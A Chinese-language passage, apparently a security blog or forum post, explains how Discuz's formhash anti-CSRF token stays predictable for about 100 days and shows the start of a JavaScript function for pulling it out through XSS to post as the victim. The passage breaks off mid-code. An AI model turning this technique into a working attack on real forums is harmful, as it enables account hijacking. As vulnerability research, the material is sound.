xss劫持发帖

貌似zone里面有个discuz 如何post 发帖的帖子 http://www.wooyun.org/bugs/wooyun-2010-015312 正好看到个dz xss案例 就研究了下 熟悉discuz的都知道,formhash是一种类似验证码的东西，用来防止从我们网站外部提交数据，但不需要我们手动输入,它在页面打开时就已经生成了，存在一需要提交数据用到的地方的隐藏input里(比如登录、发布文章)。 我们来看看这货的生成算法 function formhash($specialadd = '') { global $_G; $hashadd = defined('IN_ADMINCP') ? 'Only For Discuz! Admin Control Panel' : ''; return substr(md5(substr($_G['timestamp'], 0, -7).$_G ['username'].$_G['uid'].$_G['authkey'].$hashadd.$specialadd), 8, 8); } 时间戳前3位,大概是 100多天的样子,也就是说这货对于同一人来说 100 天内是不变的. 即可简单获取目标的formhash(算法比较傻逼=.=) function getHash() { for(var i=0; i<document.links